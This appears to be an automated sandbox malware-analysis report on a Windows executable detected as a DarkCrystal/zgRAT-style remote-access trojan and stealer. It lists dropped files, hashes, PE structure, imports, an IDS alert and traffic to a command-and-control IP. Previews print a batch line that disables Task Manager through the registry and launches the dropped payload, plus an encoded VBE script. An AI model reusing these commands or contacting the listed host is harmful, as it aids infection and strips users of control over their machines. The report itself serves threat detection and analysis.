Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.940110575590287
Encrypted:	false
SSDEEP:	48:6vJvPtPuM7Jt8Bs3FJsdcV4MKe2777TvqBHiOulajfqXSfbNtm:aPFPc+Vx9MDvkMcjRzNt
MD5:	78BBEDFB4F144CFCAC0AC8E5C9473BF3
SHA1:	44CA97B614917DAD3F799612E6A0B3FDCD31F4C8
SHA-256:	C5C2BFC98A08F9559A8EA388B56655FD909C69629983014F83B80E61AC5F1A9C
SHA-512:	EDFF9C7AA8848BCEDC4FF83D77226EA9CE0D8447A013F42756A5982A5BF63D1AF93D483E3EEC1C40773D1E94D4C1049E3E4E037EA0A754376688DE879A4360DA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Sxg.............................'... ...@....@.. ....................................@.................................X'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..0.............................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

C:\hyperComponentFontDhcp\Mscommon.exe

Download File

Process:	C:\Users\user\Desktop\kJrNOFEGbQ.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3680256
Entropy (8bit):	7.823453943837237
Encrypted:	false
SSDEEP:	49152:vlztQegrSsUqI0m8MB/KENN6y5AhjJqbLF1FZbEPhE25hCyASkzEQWwZ4IU5/Rri:vly2pM7ENt5adqvzEhtsyAgQWwZWnpI
MD5:	C47F34E03D2A705E84CCB97C250966F2
SHA1:	77C3F5F6B13A267C76D5D716FC568F243C5606EE
SHA-256:	FE7E66E8973A0886B54BAD8CD02A72B2FC81312DB742AB3E5C56919226D96A69
SHA-512:	0863F1B96AA8CAACA8279A983F3143EC943AB1042D4290F53AE3226E61A71C5C3FE5EC56F57B6126F00EAE171D947861796A28533C308A62F6A30EF466896DFA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\hyperComponentFontDhcp\Mscommon.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperComponentFontDhcp\Mscommon.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................. 8.........~>8.. ...@8...@.. ........................8...........@.................................0>8.K....@8.p....................`8...................................................... ............... ..H............text.....8.. ... 8................. ..`.rsrc...p....@8......"8.............@....reloc.......`8......&8.............@..B................`>8.....H..................h........b-..=8......................................0..........(.... ........8........E........N..........8....(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E....................o.......8....~....:.... ....~....{....:....& ....8........~....(I...~....(M... ....<.... ....~....{....9....& ....8t......... ....~....{....:Z...& ....8O...~....(A... .... .... ....s...

C:\hyperComponentFontDhcp\XvQn4w4rSFjKx2xId8OEvj2iij2aJuA.bat

Download File

Process:	C:\Users\user\Desktop\kJrNOFEGbQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	212
Entropy (8bit):	5.4651096190970465
Encrypted:	false
SSDEEP:	6:Un+3StuH1jhRiI36BVvQON/3S1q5cwhNz:U+TVjhR136V4p1q5dhN
MD5:	F0FFA05672141885D2DD1602BDB39A42
SHA1:	142E9F1B05D0C787836088B2DB9A6DD758F32024
SHA-256:	36B0B64A7B0E11E344D44DD3A0A258505847BADE2F139CFDF50368E324023C44
SHA-512:	843733379BE93BCEB521CB83BB3613E7AEA78CF09EAA9A68C735B529394CAE6AD98A0A7BC640E7EC032A1AFDE01F0F819B255E0FBE193B5E33DC064FF7E4339E
Malicious:	false
Preview:	%AKxCAWVDIlWpX%reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f%BLRJlXEvxuXhlY%..%fvBFUueewlnFXo%"C:\hyperComponentFontDhcp/Mscommon.exe"%aaBJHMIhfgpl%

C:\hyperComponentFontDhcp\uNXdwfIAGKhvsyaDygZbv1al18Fwyj4InpwIf.vbe

Download File

Process:	C:\Users\user\Desktop\kJrNOFEGbQ.exe
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	5.8115337044622155
Encrypted:	false
SSDEEP:	6:GpwqK+NkLzWbH1rFnBaORbM5nCspBSivlcSVs:GcMCzWL1hBaORbQCsfM
MD5:	5C2E5FC9D903BB5A7A7CCFDB1150B921
SHA1:	8259BA4E4A19692AE97FC0858A9E8D77D9753BF4
SHA-256:	7617DC59CD2D53204917ED13FD0A4E03EC02FEB7EB749A3510EEC1E8EB4D6A4F
SHA-512:	212EA9CCF9AC4557D9D8344EFBBD09618CC6815571661EA7B7EA2B0F0285613BEEB99133309673D74801EBD26146ADBCD873F9A11A5B4A47ACEBDC4CD4FC10C1
Malicious:	false
Preview:	#@~^zwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2v 0!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ@#@&q/4j4+Vs "EUPr/=z4Hw.DZK:aGx.xOsKxO94mwJ&(7pxWADUsN\|a a(9%627% bk%+m9E) (lOJB~Z~~6l^/+mUIAAA==^#~@.

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.6048426069826895
Encrypted:	false
SSDEEP:	12:P7g5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:edUOAokItULVDv
MD5:	A87D1C244DB090F6AF11F580B508A899
SHA1:	3DF1412C27F9C283BFCD14FC99E0242636E452F0
SHA-256:	F1C828F6B16D66B337D8ECF3020B4D66B0F47232EE86442B4B485E547743CDE9
SHA-512:	C61DBECCFAD569DCDB870AAC09E65C2C95971BBD28ACFB0D0273F1B1B1FBEE21A91521546DADCCE86E807B59A5595FB5B84171DD680AF96C1C549E2F192BE97E
Malicious:	false
Preview:	..Pinging 610930 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.740545664634834
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	kJrNOFEGbQ.exe
File size:	4'234'106 bytes
MD5:	36bbafbd00e62a37070764eb4ed93308
SHA1:	40acb7b8fec8d6d8e0d0a9310c511a35d0b34c27
SHA256:	7fbf15fc103c368c639ba11695315909b1dbd9361e83cf48fb2177cc8ff060e2
SHA512:	90333b2217773f1d9a667156b84ba785c0ee266b68c832d51a468f9de05550ede939938c659bd87f772edf2781729541bc03979068ced111ea606ed2ed6ab057
SSDEEP:	98304:nOj98ly2pM7ENt5adqvzEhtsyAgQWwZWnpIt:w85pMA646wZEpIt
TLSH:	4016E106A6A24E73C3512F3CE4E2253D817CDB61B953DFC77A3A1095FC152609AA2DF2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	f0e9c4f0d0e972c7

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007FA16050543Bh
jmp 00007FA160504D4Dh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FA1604F7B97h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007FA1605081DFh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FA160504EDCh
push 0000000Ch
push esi
call 00007FA160504499h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FA1604F7B12h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FA160507C99h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FA160504E58h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FA160507C7Ch
int3
jmp 00007FA160509717h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x4698c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xab000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0x4698c	0x46a00	a942dea735ae9e5f9f646c2b5189372e	False	0.4457169524336283	data	5.848102324087047	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xab000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64524	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x6506c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66618	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 262144			0.4308851377341184
RT_DIALOG	0xa8640	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0xa88c8	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0xa8a04	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0xa8af0	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0xa8c20	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0xa8f58	0x252	data	English	United States	0.5757575757575758
RT_STRING	0xa91ac	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0xa9390	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0xa955c	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0xa9714	0x146	data	English	United States	0.5153374233128835
RT_STRING	0xa985c	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0xa9cc8	0x166	data	English	United States	0.49162011173184356
RT_STRING	0xa9e30	0x152	data	English	United States	0.5059171597633136
RT_STRING	0xa9f84	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0xaa090	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0xaa14c	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0xaa224	0x14	data			1.1
RT_MANIFEST	0xaa238	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-03T20:47:39.900911+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49736	193.58.121.137	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 20:47:39.212910891 CET	49736	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:39.217890024 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:39.217973948 CET	49736	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:39.219044924 CET	49736	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:39.223808050 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:39.576263905 CET	49736	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:39.581183910 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:39.859349966 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:39.900854111 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:39.900871992 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:39.900911093 CET	49736	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:40.121293068 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:40.122080088 CET	49736	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:40.122101068 CET	49736	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:40.168848038 CET	49736	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:40.173851967 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:40.324088097 CET	49737	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:40.329257965 CET	80	49737	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:40.329333067 CET	49737	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:40.329499960 CET	49737	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:40.334333897 CET	80	49737	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:40.363717079 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:40.363887072 CET	49736	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:40.368679047 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:40.558882952 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:40.559545040 CET	49736	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:40.564364910 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:40.694832087 CET	49737	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:40.699820042 CET	80	49737	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:40.873181105 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:40.903309107 CET	49736	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:40.908281088 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:40.908298969 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:40.908313036 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:41.060632944 CET	80	49737	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:41.122078896 CET	49737	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:41.187624931 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:41.187889099 CET	49736	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:41.191145897 CET	80	49737	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:41.192759037 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:41.309597015 CET	49737	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:41.411417961 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:41.414933920 CET	49736	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:41.419802904 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:41.419939041 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:41.523248911 CET	49737	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:41.523726940 CET	49738	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:41.528357983 CET	80	49737	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:41.528405905 CET	49737	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:41.528593063 CET	80	49738	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:41.528650045 CET	49738	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:41.532927036 CET	49738	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:41.537796974 CET	80	49738	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:41.739913940 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:41.888257980 CET	49738	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:41.893183947 CET	80	49738	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:41.893198967 CET	80	49738	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:41.893220901 CET	80	49738	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:41.919116020 CET	49736	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:42.176409006 CET	80	49738	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:42.310179949 CET	49738	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:42.318356991 CET	80	49738	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:42.418963909 CET	49738	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:42.613490105 CET	49736	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:42.613490105 CET	49738	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:42.619028091 CET	80	49736	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:42.619148016 CET	80	49738	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:42.619174004 CET	49736	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:42.619250059 CET	49738	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:42.623217106 CET	49741	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:42.628052950 CET	80	49741	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:42.628664017 CET	49741	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:42.629589081 CET	49741	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:42.634351015 CET	80	49741	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:43.173430920 CET	49741	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:43.178423882 CET	80	49741	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:43.178443909 CET	80	49741	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:43.178457022 CET	80	49741	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:43.269217968 CET	80	49741	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:43.396414995 CET	80	49741	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:43.396501064 CET	49741	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:43.527714014 CET	49741	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:43.527890921 CET	49742	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:43.532762051 CET	80	49742	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:43.533004999 CET	80	49741	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:43.533108950 CET	49741	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:43.533195972 CET	49742	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:43.533195972 CET	49742	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:43.537952900 CET	80	49742	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:43.887830019 CET	49742	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:43.892920971 CET	80	49742	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:43.892941952 CET	80	49742	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:43.892956972 CET	80	49742	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:44.213927031 CET	80	49742	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:44.355870962 CET	80	49742	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:44.355930090 CET	49742	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:44.500725985 CET	49742	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:44.501290083 CET	49744	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:44.505891085 CET	80	49742	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:44.505944967 CET	49742	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:44.506057024 CET	80	49744	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:44.506125927 CET	49744	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:44.506268024 CET	49744	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:44.511074066 CET	80	49744	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:44.856565952 CET	49744	80	192.168.2.4	193.58.121.137
